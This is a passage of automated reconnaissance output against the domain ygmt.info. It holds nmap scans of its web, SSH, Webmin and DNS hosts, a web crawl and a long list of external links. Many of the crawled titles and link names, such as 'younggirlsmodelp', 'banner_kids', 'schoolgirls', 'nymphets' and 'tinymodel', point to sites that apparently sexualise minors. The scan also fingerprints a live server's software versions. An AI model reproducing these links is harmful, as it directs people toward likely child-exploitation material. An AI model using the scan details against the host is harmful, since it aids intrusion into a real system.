1248 Host 185.82.200.52 is up (reset ttl 64)
1249 Host 195.154.94.174 is up (reset ttl 64)
1250 Host 54.36.109.15 is up (reset ttl 64)
1251 Host 45.58.122.82 is up (echo-reply ttl 51)
1252 Host 104.216.69.250 is up (reset ttl 64)
1253 Host 95.141.37.127 is up (reset ttl 64)
1254
1255 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
1256 Scanning ip 185.82.200.52 (www.ygmt.info.):
1257 22/tcp open ssh syn-ack ttl 51 OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
1258 | ssh-hostkey:
1259 | 1024 7f:00:73:df:2a:6e:87:58:3f:76:07:05:5f:92:5b:8c (DSA)
1260 | 2048 40:01:47:ca:ce:05:1c:b8:30:d2:2c:6d:bc:a7:eb:4c (RSA)
1261 | 256 99:cb:fc:6d:e6:51:0d:46:73:06:0e:65:20:8c:c3:d0 (ECDSA)
1262 |_ 256 9e:0b:2d:8f:86:18:26:96:72:48:2d:12:a3:d0:1a:78 (ED25519)
1263 80/tcp open http syn-ack ttl 51 Apache httpd 2.4.10 ((Debian))
1264 | http-methods:
1265 |_ Supported Methods: GET HEAD POST OPTIONS
1266 |_http-server-header: Apache/2.4.10 (Debian)
1267 |_http-title: MET-ART FREE TEEN GALLERIES BARELY LEGAL EROTIC PHOTO NUDE NYM...
1268 443/tcp open ssl/http syn-ack ttl 51 Apache httpd 2.4.10 ((Debian))
1269 |_http-favicon: Unknown favicon MD5: 216B1DF79EDF8917840C49A34B86B823
1270 | http-methods:
1271 |_ Supported Methods: GET HEAD POST OPTIONS
1272 |_http-server-header: Apache/2.4.10 (Debian)
1273 |_http-title: Books, videos, photos, fiction and non-fiction of and about yo...
1274 | ssl-cert: Subject: commonName=ygmt.info
1275 | Subject Alternative Name: DNS:ygmt.info, DNS:www.ygmt.info
1276 | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1277 | Public Key type: rsa
1278 | Public Key bits: 2048
1279 | Signature Algorithm: sha256WithRSAEncryption
1280 | Not valid before: 2017-02-14T00:00:00
1281 | Not valid after: 2018-02-14T23:59:59
1282 | MD5: b8e6 d17f a421 4c77 d48e 9e61 b23e 6971
1283 |_SHA-1: c46e 6ea4 c40d 22da 6302 a416 b68b f8a8 90b8 f667
1284 |_ssl-date: TLS randomness does not represent time
1285 10000/tcp open http syn-ack ttl 51 MiniServ 1.910 (Webmin httpd)
1286 |_http-favicon: Unknown favicon MD5: 65A103EF6B83A5BBBAB46C83651063C9
1287 | http-methods:
1288 |_ Supported Methods: GET HEAD POST OPTIONS
1289 |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
1290 OS Info: Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1291 Scanning ip 195.154.94.174 (freedns3.registrar-servers.com (PTR)):
1292 Scanning ip 54.36.109.15 (freedns5.registrar-servers.com (PTR)):
1293 53/tcp open domain? syn-ack ttl 49
1294 | dns-nsid:
1295 | NSID: freedns5.registrar-servers.com (66726565646e73352e7265676973747261722d736572766572732e636f6d)
1296 |_ id.server: freedns5.registrar-servers.com
1297 | fingerprint-strings:
1298 | DNSVersionBindReqTCP:
1299 | version
1300 |_ bind
1301 Scanning ip 45.58.122.82 (freedns1.registrar-servers.com):
1302 53/tcp open domain? syn-ack ttl 51
1303 | dns-nsid:
1304 | NSID: freedns1.registrar-servers.com (66726565646e73312e7265676973747261722d736572766572732e636f6d)
1305 |_ id.server: freedns1.registrar-servers.com
1306 | fingerprint-strings:
1307 | DNSVersionBindReqTCP:
1308 | version
1309 |_ bind
1310 Scanning ip 104.216.69.250 (freedns2.registrar-servers.com (PTR)):
1311 53/tcp open domain? syn-ack ttl 52
1312 | dns-nsid:
1313 | NSID: freedns2.registrar-servers.com (66726565646e73322e7265676973747261722d736572766572732e636f6d)
1314 |_ id.server: freedns2.registrar-servers.com
1315 | fingerprint-strings:
1316 | DNSVersionBindReqTCP:
1317 | version
1318 |_ bind
1319 Scanning ip 95.141.37.127 (freedns4.registrar-servers.com (PTR)):
1320 53/tcp open domain? syn-ack ttl 50
1321 | dns-nsid:
1322 | NSID: freedns4.registrar-servers.com (66726565646e73342e7265676973747261722d736572766572732e636f6d)
1323 |_ id.server: freedns4.registrar-servers.com
1324 | fingerprint-strings:
1325 | DNSVersionBindReqTCP:
1326 | version
1327 |_ bind
1328 WebCrawling domain's web servers... up to 50 max links.
1329
1330 + URL to crawl: http://www.ygmt.info.
1331 + Date: 2019-10-06
1332
1333 + Crawling URL: http://www.ygmt.info.:
1334 + Links:
1335 + Crawling http://www.ygmt.info.
1336 + Crawling http://www.ygmt.info./top50/index.php
1337 + Crawling http://www.ygmt.info./top50/index.php?method=in&cat=Free+Sites&start=1
1338 + Crawling http://www.ygmt.info./top50/index.php?method=in&cat=Pay+Sites&start=1
1339 + Crawling http://www.ygmt.info./top50/index.php?method=in&cat=Nonude+Sites&start=1
1340 + Crawling http://www.ygmt.info./top50/index.php?method=in&cat=Security&start=1
1341 + Crawling http://www.ygmt.info./top50/index.php?method=in&cat=Top+Lists&start=1
1342 + Crawling http://www.ygmt.info./top50/index.php?method=in&cat=Book+Stores&start=1
1343 + Searching for directories...
1344 - Found: http://www.ygmt.info./top50/
1345 - Found: http://www.ygmt.info./top50/css/
1346 - Found: http://www.ygmt.info./top50/js/
1347 - Found: http://www.ygmt.info./bn/
1348 - Found: http://www.ygmt.info./top50/skins/
1349 - Found: http://www.ygmt.info./top50/skins/photo50/
1350 - Found: http://www.ygmt.info./banner/
1351 + Searching open folders...
1352 - http://www.ygmt.info./top50/ (No Open Folder)
1353 - http://www.ygmt.info./top50/css/ (403 Forbidden)
1354 - http://www.ygmt.info./top50/js/ (403 Forbidden)
1355 - http://www.ygmt.info./bn/ (403 Forbidden)
1356 - http://www.ygmt.info./top50/skins/ (403 Forbidden)
1357 - http://www.ygmt.info./top50/skins/photo50/ (403 Forbidden)
1358 - http://www.ygmt.info./banner/ (403 Forbidden)
1359 + Crawl finished successfully.
1360----------------------------------------------------------------------
1361Summary of http://http://www.ygmt.info.
1362----------------------------------------------------------------------
1363+ Links crawled:
1364 - http://www.ygmt.info.
1365 - http://www.ygmt.info./top50/index.php
1366 - http://www.ygmt.info./top50/index.php?method=in&cat=Book+Stores&start=1
1367 - http://www.ygmt.info./top50/index.php?method=in&cat=Free+Sites&start=1
1368 - http://www.ygmt.info./top50/index.php?method=in&cat=Nonude+Sites&start=1
1369 - http://www.ygmt.info./top50/index.php?method=in&cat=Pay+Sites&start=1
1370 - http://www.ygmt.info./top50/index.php?method=in&cat=Security&start=1
1371 - http://www.ygmt.info./top50/index.php?method=in&cat=Top+Lists&start=1
1372 Total links crawled: 8
1373
1374+ Links to files found:
1375 - http://www.ygmt.info./banner/pp_00222l.jpg
1376 - http://www.ygmt.info./banner/virginz.gif
1377 - http://www.ygmt.info./bn/VeraCrypt128x128.png
1378 - http://www.ygmt.info./bn/ban23.jpg
1379 - http://www.ygmt.info./bn/banner.png
1380 - http://www.ygmt.info./bn/banner3a.png
1381 - http://www.ygmt.info./bn/domai-banner3.jpg
1382 - http://www.ygmt.info./bn/dreamsphoto4.jpg
1383 - http://www.ygmt.info./bn/hegbanner.jpg
1384 - http://www.ygmt.info./bn/image1199.jpg
1385 - http://www.ygmt.info./bn/image2144.jpg
1386 - http://www.ygmt.info./bn/md18980540562.jpg
1387 - http://www.ygmt.info./bn/murian.jpg
1388 - http://www.ygmt.info./bn/nz.jpg
1389 - http://www.ygmt.info./bn/sweet-angels.png
1390 - http://www.ygmt.info./bn/tm.jpg
1391 - http://www.ygmt.info./bn/usenet-300x57.jpg
1392 - http://www.ygmt.info./bn/vbulletin4_logo.png
1393 - http://www.ygmt.info./favicon.ico
1394 - http://www.ygmt.info./top50/css/tooltipster-follower.min.css
1395 - http://www.ygmt.info./top50/css/tooltipster.bundle.min.css
1396 - http://www.ygmt.info./top50/js/jquery.js
1397 - http://www.ygmt.info./top50/js/scroll.js
1398 - http://www.ygmt.info./top50/js/scrolltop.js
1399 - http://www.ygmt.info./top50/js/tooltipster-follower.min.js
1400 - http://www.ygmt.info./top50/js/tooltipster.bundle.min.js
1401 - http://www.ygmt.info./top50/js/tooltipster4.js
1402 - http://www.ygmt.info./top50/skins/photo50/neutral1.png
1403 Total links to files: 28
1404
1405+ Externals links found:
1406 - android-app://
1407 - http://U.webring.com/wrman?ring=younggirlsmodelp&addsite
1408 - http://affiliate.dtiserv.com/image/3deros/2347001.gif
1409 - http://alibis.zde.cz/
1410 - http://alt.binaries.pictures.bcseries.org/top.php?t=toprating
1411 - http://alt.binaries.pictures.y-a-b.info/groups.php?group=alt.binaries.pictures.sandra
1412 - http://anonym.to/?http://www.charmkids.net/
1413 - http://anonym.to/?http://www.strikepro.jp/talent/izumi_haru.html
1414 - http://cdoll.top
1415 - http://click.dtiserv2.com/Click2/2347001-347-us5905
1416 - http://groups.yahoo.com/group/my-usenetcom/join
1417 - http://gurugallerie.com
1418 - http://img.webring.com/r/y/younggirlsmodelp/navbarlogo
1419 - http://img.webring.com/wrsm1.gif
1420 - http://kansai.ma.cx/
1421 - http://kansai.ma.cx/img/banner.gif
1422 - http://latinpetite.ma.cx
1423 - http://members.mclt.net/
1424 - http://met-art.nymphs.us
1425 - http://my-usenet.com
1426 - http://my.sweet-angels.net/top.php?t=toprating
1427 - http://my.usenetarchive.net/banner.jpg
1428 - http://promo.averotica.com/banners/averotica-468x100-1.jpg
1429 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=900004-0000&PA=996312
1430 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=919377-0000&PA=996348
1431 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=920029-0000&PA=996369
1432 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=925479-0000&PA=999721&HTML=http://www.nubiles.net/?coupon=999721
1433 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=925728-0004&PA=2189756&HTML=http://www.schoolgirls-asia.com/new/schoolgirlsasia.htm
1434 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=927141-0000&PA=999829
1435 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=927342&PA=999327&HTML=http://www.abigail18.com
1436 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=928337-0006&PA=2447122&BAN=0
1437 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=928350-0000&PA=2147379
1438 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=930360-0000&PA=1252416
1439 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=932281-0000&PA=2347265&HTML=http://www.richardmurrian.net/
1440 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0000&PA=1984667&BAN=2&HTML=http://girlsdelta.com/main/
1441 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=933350-0002&PA=1984667&HTML=http://girlsdelta.com/main/
1442 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=935262&PA=2147380&HTML=http://www.averotica.com/
1443 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=935262&PA=2147380&HTML=http://www.eronata.com/
1444 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=935262&PA=2147380&HTML=http://www.skokoff.com/
1445 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=938572-0000&PA=2147454&HTML=http://www.realpeachez.com/
1446 - http://refer.ccbill.com/cgi-bin/clicks.cgi?CA=940234-0000&PA=2330083&HTML=http://zora.girly-shoot.com
1447 - http://refer.ccbill.com/cgi-bin/clicks.cgi?ca=901313&PA=1544909&HTML=http://tour7.met-art.com/
1448 - http://refer.ccbill.com/cgi-bin/clicks.cgi?ca=901313&pa=996319&html=http://www.errotica-archives.com/
1449 - http://sweet-angels.net
1450 - http://tiny.ma.cx
1451 - http://tinymodel-raven.info/
1452 - http://tokyodoll.ma.cx
1453 - http://tokyodoll.ma.cx/
1454 - http://tokyodoll.tv
1455 - http://www.247teencash.net/banner/zora.shoot/468x60_03.jpg
1456 - http://www.aardvarktopsitesphp.com/
1457 - http://www.affiliate-cash.de/kunden.php?nummer=780877247&progid=24307
1458 - http://www.affiliate-cash.de/kunden.php?nummer=780877247&progid=26158
1459 - http://www.affiliate-cash.de/kunden.php?nummer=780877247&progid=28177
1460 - http://www.art-lingerie.com/t1/?crid=2147492
1461 - http://www.barfine2cash.com/images/schoolbanner06.gif
1462 - http://www.bc-series.pw
1463 - http://www.beautygirl-story.com/
1464 - http://www.body-n-mind.com/EnatureBannerLink.jpg
1465 - http://www.body-n-mind.com/naturista.htm
1466 - http://www.ccleaner.com
1467 - http://www.cdoll.top
1468 - http://www.dreamsphoto.com
1469 - http://www.dreamsphoto.com/
1470 - http://www.eternal-nymphets.net
1471 - http://www.eternal-nymphets.net/
1472 - http://www.garoaida.co.jp/
1473 - http://www.glamour.cz/
1474 - http://www.gulli.com/
1475 - http://www.imageport.info/pages/femjoy.com.jpg
1476 - http://www.imageport.org
1477 - http://www.imageport.org/imageport.jpg
1478 - http://www.jav-teen.club
1479 - http://www.javpetite.top
1480 - http://www.javpetite.top/reviews/banner460-60.jpg
1481 - http://www.javpetite.top/reviews/index.html
1482 - http://www.javusenet.com
1483 - http://www.javusenet.com/
1484 - http://www.korinna.de/banner/berf1.jpg
1485 - http://www.korinna.de/bilder/photos.html
1486 - http://www.magicnude.com/r5000/5007.gif
1487 - http://www.mclt.net
1488 - http://www.my-usenet.com/
1489 - http://www.ne.jp/asahi/kookaburra/supermac/
1490 - http://www.ne.jp/asahi/kookaburra/supermac/image/kooka_Banner.jpg
1491 - http://www.newnudecash.com/hit.php?s=1&p=2&w=106991&t=1&c=
1492 - http://www.newnudecash.com/hit.php?s=2&p=2&w=106991&t=0&c=
1493 - http://www.newnudecash.com/hit.php?s=3&p=2&w=106991&t=0&c=
1494 - http://www.newstar-bambi.com/images/banner3.gif
1495 - http://www.newstar-bambi.info/
1496 - http://www.newstar-candy.info
1497 - http://www.newstar-diana.info/
1498 - http://www.newstar-krystal.info/
1499 - http://www.newstar-krystal.info/images/banner3.gif
1500 - http://www.nn-usenet.com/img/banner2.jpg
1501 - http://www.nymphs.us
1502 - http://www.nymphs.us/?;id=4&next
1503 - http://www.nymphs.us/?;id=4&prev
1504 - http://www.nymphs.us/?;id=4&random
1505 - http://www.sweet-angels.net
1506 - http://www.sweet-angels.net/
1507 - http://www.sweet-lilly.com/grafik/banner01.gif
1508 - http://www.sweet-trixie.com/grafik/banner06.jpg
1509 - http://www.teeny-models.com
1510 - http://www.thenewnude.com/topimage.jpg
1511 - http://www.tinymodel-amber.info/
1512 - http://www.tinymodel-kiki.info
1513 - http://www.tinymodel-princess.info
1514 - http://www.tinymodel-princess.info/images/banner6.gif
1515 - http://www.usenetarchive.net
1516 - http://www.vorratsdatenspeicherung.de/
1517 - http://www.y-a-b.net/
1518 - http://www.ygmt.info/banner/latinabanner.jpg
1519 - http://www.ygmt.info/bn/bc-series.png
1520 - http://www.ygmt.info/bn/sweet-angels.png
1521 - http://www.ygmt.info/images/button.png
1522 - http://www.ygmt.info/top50/
1523 - http://www.ygmt.info/top50/feed.php
1524 - http://www.ygmt.info/top50/feed.php?cat=Book Stores
1525 - http://www.ygmt.info/top50/feed.php?cat=Free Sites
1526 - http://www.ygmt.info/top50/feed.php?cat=Nonude Sites
1527 - http://www.ygmt.info/top50/feed.php?cat=Pay Sites
1528 - http://www.ygmt.info/top50/feed.php?cat=Security
1529 - http://www.ygmt.info/top50/feed.php?cat=Top Lists
1530 - http://www.ygmt.info/top50/index.php?a=join
1531 - http://www.ygmt.info/top50/index.php?a=stats
1532 - http://www.ygmt.info/top50/index.php?a=stats&u=1
1533 - http://www.ygmt.info/top50/index.php?a=stats&u=100
1534 - http://www.ygmt.info/top50/index.php?a=stats&u=101
1535 - http://www.ygmt.info/top50/index.php?a=stats&u=103
1536 - http://www.ygmt.info/top50/index.php?a=stats&u=106
1537 - http://www.ygmt.info/top50/index.php?a=stats&u=107
1538 - http://www.ygmt.info/top50/index.php?a=stats&u=11
1539 - http://www.ygmt.info/top50/index.php?a=stats&u=12
1540 - http://www.ygmt.info/top50/index.php?a=stats&u=13
1541 - http://www.ygmt.info/top50/index.php?a=stats&u=14
1542 - http://www.ygmt.info/top50/index.php?a=stats&u=15
1543 - http://www.ygmt.info/top50/index.php?a=stats&u=16
1544 - http://www.ygmt.info/top50/index.php?a=stats&u=17
1545 - http://www.ygmt.info/top50/index.php?a=stats&u=18
1546 - http://www.ygmt.info/top50/index.php?a=stats&u=19
1547 - http://www.ygmt.info/top50/index.php?a=stats&u=2
1548 - http://www.ygmt.info/top50/index.php?a=stats&u=20
1549 - http://www.ygmt.info/top50/index.php?a=stats&u=21
1550 - http://www.ygmt.info/top50/index.php?a=stats&u=22
1551 - http://www.ygmt.info/top50/index.php?a=stats&u=23
1552 - http://www.ygmt.info/top50/index.php?a=stats&u=25
1553 - http://www.ygmt.info/top50/index.php?a=stats&u=27
1554 - http://www.ygmt.info/top50/index.php?a=stats&u=28
1555 - http://www.ygmt.info/top50/index.php?a=stats&u=29
1556 - http://www.ygmt.info/top50/index.php?a=stats&u=3
1557 - http://www.ygmt.info/top50/index.php?a=stats&u=30
1558 - http://www.ygmt.info/top50/index.php?a=stats&u=31
1559 - http://www.ygmt.info/top50/index.php?a=stats&u=32
1560 - http://www.ygmt.info/top50/index.php?a=stats&u=33
1561 - http://www.ygmt.info/top50/index.php?a=stats&u=34
1562 - http://www.ygmt.info/top50/index.php?a=stats&u=35
1563 - http://www.ygmt.info/top50/index.php?a=stats&u=36
1564 - http://www.ygmt.info/top50/index.php?a=stats&u=37
1565 - http://www.ygmt.info/top50/index.php?a=stats&u=38
1566 - http://www.ygmt.info/top50/index.php?a=stats&u=39
1567 - http://www.ygmt.info/top50/index.php?a=stats&u=4
1568 - http://www.ygmt.info/top50/index.php?a=stats&u=40
1569 - http://www.ygmt.info/top50/index.php?a=stats&u=42
1570 - http://www.ygmt.info/top50/index.php?a=stats&u=43
1571 - http://www.ygmt.info/top50/index.php?a=stats&u=44
1572 - http://www.ygmt.info/top50/index.php?a=stats&u=45
1573 - http://www.ygmt.info/top50/index.php?a=stats&u=46
1574 - http://www.ygmt.info/top50/index.php?a=stats&u=47
1575 - http://www.ygmt.info/top50/index.php?a=stats&u=48
1576 - http://www.ygmt.info/top50/index.php?a=stats&u=49
1577 - http://www.ygmt.info/top50/index.php?a=stats&u=5
1578 - http://www.ygmt.info/top50/index.php?a=stats&u=50
1579 - http://www.ygmt.info/top50/index.php?a=stats&u=51
1580 - http://www.ygmt.info/top50/index.php?a=stats&u=52
1581 - http://www.ygmt.info/top50/index.php?a=stats&u=53
1582 - http://www.ygmt.info/top50/index.php?a=stats&u=54
1583 - http://www.ygmt.info/top50/index.php?a=stats&u=55
1584 - http://www.ygmt.info/top50/index.php?a=stats&u=56
1585 - http://www.ygmt.info/top50/index.php?a=stats&u=58
1586 - http://www.ygmt.info/top50/index.php?a=stats&u=59
1587 - http://www.ygmt.info/top50/index.php?a=stats&u=6
1588 - http://www.ygmt.info/top50/index.php?a=stats&u=60
1589 - http://www.ygmt.info/top50/index.php?a=stats&u=61
1590 - http://www.ygmt.info/top50/index.php?a=stats&u=62
1591 - http://www.ygmt.info/top50/index.php?a=stats&u=63
1592 - http://www.ygmt.info/top50/index.php?a=stats&u=64
1593 - http://www.ygmt.info/top50/index.php?a=stats&u=65
1594 - http://www.ygmt.info/top50/index.php?a=stats&u=66
1595 - http://www.ygmt.info/top50/index.php?a=stats&u=68
1596 - http://www.ygmt.info/top50/index.php?a=stats&u=69
1597 - http://www.ygmt.info/top50/index.php?a=stats&u=7
1598 - http://www.ygmt.info/top50/index.php?a=stats&u=70
1599 - http://www.ygmt.info/top50/index.php?a=stats&u=71
1600 - http://www.ygmt.info/top50/index.php?a=stats&u=72
1601 - http://www.ygmt.info/top50/index.php?a=stats&u=73
1602 - http://www.ygmt.info/top50/index.php?a=stats&u=74
1603 - http://www.ygmt.info/top50/index.php?a=stats&u=75
1604 - http://www.ygmt.info/top50/index.php?a=stats&u=76
1605 - http://www.ygmt.info/top50/index.php?a=stats&u=77
1606 - http://www.ygmt.info/top50/index.php?a=stats&u=79
1607 - http://www.ygmt.info/top50/index.php?a=stats&u=80
1608 - http://www.ygmt.info/top50/index.php?a=stats&u=81
1609 - http://www.ygmt.info/top50/index.php?a=stats&u=82
1610 - http://www.ygmt.info/top50/index.php?a=stats&u=83
1611 - http://www.ygmt.info/top50/index.php?a=stats&u=86
1612 - http://www.ygmt.info/top50/index.php?a=stats&u=87
1613 - http://www.ygmt.info/top50/index.php?a=stats&u=88
1614 - http://www.ygmt.info/top50/index.php?a=stats&u=89
1615 - http://www.ygmt.info/top50/index.php?a=stats&u=9
1616 - http://www.ygmt.info/top50/index.php?a=stats&u=91
1617 - http://www.ygmt.info/top50/index.php?a=stats&u=92
1618 - http://www.ygmt.info/top50/index.php?a=stats&u=93
1619 - http://www.ygmt.info/top50/index.php?a=stats&u=94
1620 - http://www.ygmt.info/top50/index.php?a=stats&u=95
1621 - http://www.ygmt.info/top50/index.php?a=stats&u=96
1622 - http://www.ygmt.info/top50/index.php?a=stats&u=97
1623 - http://www.ygmt.info/top50/index.php?a=stats&u=98
1624 - http://www.ygmt.info/top50/index.php?a=user_cpl
1625 - http://www.ygmt.info/top50/index.php?cat=Book+Stores
1626 - http://www.ygmt.info/top50/index.php?cat=Free+Sites
1627 - http://www.ygmt.info/top50/index.php?cat=Nonude+Sites
1628 - http://www.ygmt.info/top50/index.php?cat=Pay+Sites
1629 - http://www.ygmt.info/top50/index.php?cat=Security
1630 - http://www.ygmt.info/top50/index.php?cat=Top+Lists
1631 - http://www.ygmt.info/top50/skins/photo50/down.png
1632 - http://www.ygmt.info/top50/skins/photo50/lebanner.png
1633 - http://www.ygmt.info/top50/skins/photo50/neutral.png
1634 - http://www.ygmt.info/top50/skins/photo50/rate_3.png
1635 - http://www.ygmt.info/top50/skins/photo50/rate_4.png
1636 - http://www.ygmt.info/top50/skins/photo50/screen.css
1637 - http://www.ygmt.info/top50/skins/photo50/stats.png
1638 - http://www.ygmt.info/top50/skins/photo50/up.png
1639 - http://www0.ma.cx
1640 - http://ygmt.info/
1641 - http://ygmt.info/banner/CDOLL_top_11.jpg
1642 - http://ygmt.info/banner/banner2.jpg
1643 - http://ygmt.info/banner/banner_835x103_08_on.jpg
1644 - http://ygmt.info/banner/dreamsphoto1.jpg
1645 - http://ygmt.info/banner/emasplace.jpg
1646 - http://ygmt.info/banner/eternalbanner1.jpg
1647 - http://ygmt.info/banner/guru.jpg
1648 - http://ygmt.info/banner/petite.jpg
1649 - http://ygmt.info/banner/rikitake.jpg
1650 - http://ygmt.info/banner/sweetbanner03.jpg
1651 - http://ygmt.info/banner/tinyangels3.jpg
1652 - http://ygmt.info/banner/tinynymphs1.jpg
1653 - http://ygmt.info/bn/banner3.jpg
1654 - http://ygmt.info/bn/banner700x69_en.jpg
1655 - http://ygmt.info/bn/kansai.gif
1656 - http://ygmt.info/bn/nozomikurahashi.jpg
1657 - http://ygmt.metadns.cx/banner/MoreyAN0511.gif
1658 - http://ygmt.metadns.cx/banner/banner_835x103_10_on.jpg
1659 - http://ygmt.metadns.cx/banner/banner_kids.gif
1660 - http://ygmt.metadns.cx/banner/blog_izumi_haru.jpg
1661 - http://ygmt.metadns.cx/banner/emasplace.jpg
1662 - http://ygmt.metadns.cx/banner/eternalbanner1.jpg
1663 - http://ygmt.metadns.cx/images/button.png
1664 - http://youthful2.free.fr/datenspeicherung/logo2.jpg
1665 - https://veracrypt.codeplex.com/
1666 - https://www.abebooks.de/buch-suchen/autor/der-naturist/
1667 - https://www.sexart.com/
1668 - https://www.usenetarchive.net/banner.jpg
1669 - https://www.usenetarchive.net/img/myusenet1.png
1670 - https://www.usenetarchive.net/top.php?t=toprating
1671 - https://www.ygmt.info/
1672 Total external links: 266
1673
1674+ Email addresses found:
1675 Total email address found: 0
1676
1677+ Directories found:
1678 - http://www.ygmt.info./banner/ (403 Forbidden)
1679 - http://www.ygmt.info./bn/ (403 Forbidden)
1680 - http://www.ygmt.info./top50/ (No open folder)
1681 - http://www.ygmt.info./top50/css/ (403 Forbidden)
1682 - http://www.ygmt.info./top50/js/ (403 Forbidden)
1683 - http://www.ygmt.info./top50/skins/ (403 Forbidden)
1684 - http://www.ygmt.info./top50/skins/photo50/ (403 Forbidden)
1685 Total directories: 7
1686
1687+ Directory indexing found:
1688 Total directories with indexing: 0
1689
1690----------------------------------------------------------------------
1691
1692
1693 + URL to crawl: https://www.ygmt.info.
1694 + Date: 2019-10-06
1695
1696 + Crawling URL: https://www.ygmt.info.:
1697 + Links:
1698 + Crawling https://www.ygmt.info. ([SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed (_ssl.c:727))
1699 + Searching for directories...
1700 + Searching open folders...
1701
1702
1703 + URL to crawl: http://www.ygmt.info.:10000
1704 + Date: 2019-10-06
1705
1706 + Crawling URL: http://www.ygmt.info.:10000:
1707 + Links:
1708 + Crawling http://www.ygmt.info.:10000
1709 + Searching for directories...
1710 + Searching open folders...
1711
1712--Finished--
1713Summary information for domain ygmt.info.
1714-----------------------------------------
1715
1716 Domain Ips Information:
1717 IP: 185.82.200.52
1718 HostName: www.ygmt.info. Type: A
1719 Country: Netherlands
1720 Is Active: True (reset ttl 64)
1721 Port: 22/tcp open ssh syn-ack ttl 51 OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
1722 Script Info: | ssh-hostkey:
1723 Script Info: | 1024 7f:00:73:df:2a:6e:87:58:3f:76:07:05:5f:92:5b:8c (DSA)
1724 Script Info: | 2048 40:01:47:ca:ce:05:1c:b8:30:d2:2c:6d:bc:a7:eb:4c (RSA)
1725 Script Info: | 256 99:cb:fc:6d:e6:51:0d:46:73:06:0e:65:20:8c:c3:d0 (ECDSA)
1726 Script Info: |_ 256 9e:0b:2d:8f:86:18:26:96:72:48:2d:12:a3:d0:1a:78 (ED25519)
1727 Port: 80/tcp open http syn-ack ttl 51 Apache httpd 2.4.10 ((Debian))
1728 Script Info: | http-methods:
1729 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1730 Script Info: |_http-server-header: Apache/2.4.10 (Debian)
1731 Script Info: |_http-title: MET-ART FREE TEEN GALLERIES BARELY LEGAL EROTIC PHOTO NUDE NYM...
1732 Port: 443/tcp open ssl/http syn-ack ttl 51 Apache httpd 2.4.10 ((Debian))
1733 Script Info: |_http-favicon: Unknown favicon MD5: 216B1DF79EDF8917840C49A34B86B823
1734 Script Info: | http-methods:
1735 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1736 Script Info: |_http-server-header: Apache/2.4.10 (Debian)
1737 Script Info: |_http-title: Books, videos, photos, fiction and non-fiction of and about yo...
1738 Script Info: | ssl-cert: Subject: commonName=ygmt.info
1739 Script Info: | Subject Alternative Name: DNS:ygmt.info, DNS:www.ygmt.info
1740 Script Info: | Issuer: commonName=COMODO RSA Domain Validation Secure Server CA/organizationName=COMODO CA Limited/stateOrProvinceName=Greater Manchester/countryName=GB
1741 Script Info: | Public Key type: rsa
1742 Script Info: | Public Key bits: 2048
1743 Script Info: | Signature Algorithm: sha256WithRSAEncryption
1744 Script Info: | Not valid before: 2017-02-14T00:00:00
1745 Script Info: | Not valid after: 2018-02-14T23:59:59
1746 Script Info: | MD5: b8e6 d17f a421 4c77 d48e 9e61 b23e 6971
1747 Script Info: |_SHA-1: c46e 6ea4 c40d 22da 6302 a416 b68b f8a8 90b8 f667
1748 Script Info: |_ssl-date: TLS randomness does not represent time
1749 Port: 10000/tcp open http syn-ack ttl 51 MiniServ 1.910 (Webmin httpd)
1750 Script Info: |_http-favicon: Unknown favicon MD5: 65A103EF6B83A5BBBAB46C83651063C9
1751 Script Info: | http-methods:
1752 Script Info: |_ Supported Methods: GET HEAD POST OPTIONS
1753 Script Info: |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
1754 Os Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
1755 IP: 195.154.94.174
1756 HostName: freedns3.registrar-servers.com Type: NS
1757 HostName: freedns3.registrar-servers.com Type: PTR
1758 Country: France
1759 Is Active: True (reset ttl 64)
1760 IP: 54.36.109.15
1761 HostName: freedns5.registrar-servers.com Type: NS
1762 HostName: freedns5.registrar-servers.com Type: PTR
1763 Country: Germany
1764 Is Active: True (reset ttl 64)
1765 Port: 53/tcp open domain? syn-ack ttl 49
1766 Script Info: | dns-nsid:
1767 Script Info: | NSID: freedns5.registrar-servers.com (66726565646e73352e7265676973747261722d736572766572732e636f6d)
1768 Script Info: |_ id.server: freedns5.registrar-servers.com
1769 Script Info: | fingerprint-strings:
1770 Script Info: | DNSVersionBindReqTCP:
1771 Script Info: | version
1772 Script Info: |_ bind
1773 IP: 45.58.122.82
1774 HostName: freedns1.registrar-servers.com Type: NS
1775 Country: United States
1776 Is Active: True (echo-reply ttl 51)
1777 Port: 53/tcp open domain? syn-ack ttl 51
1778 Script Info: | dns-nsid:
1779 Script Info: | NSID: freedns1.registrar-servers.com (66726565646e73312e7265676973747261722d736572766572732e636f6d)
1780 Script Info: |_ id.server: freedns1.registrar-servers.com
1781 Script Info: | fingerprint-strings:
1782 Script Info: | DNSVersionBindReqTCP:
1783 Script Info: | version
1784 Script Info: |_ bind
1785 IP: 104.216.69.250
1786 HostName: freedns2.registrar-servers.com Type: NS
1787 HostName: freedns2.registrar-servers.com Type: PTR
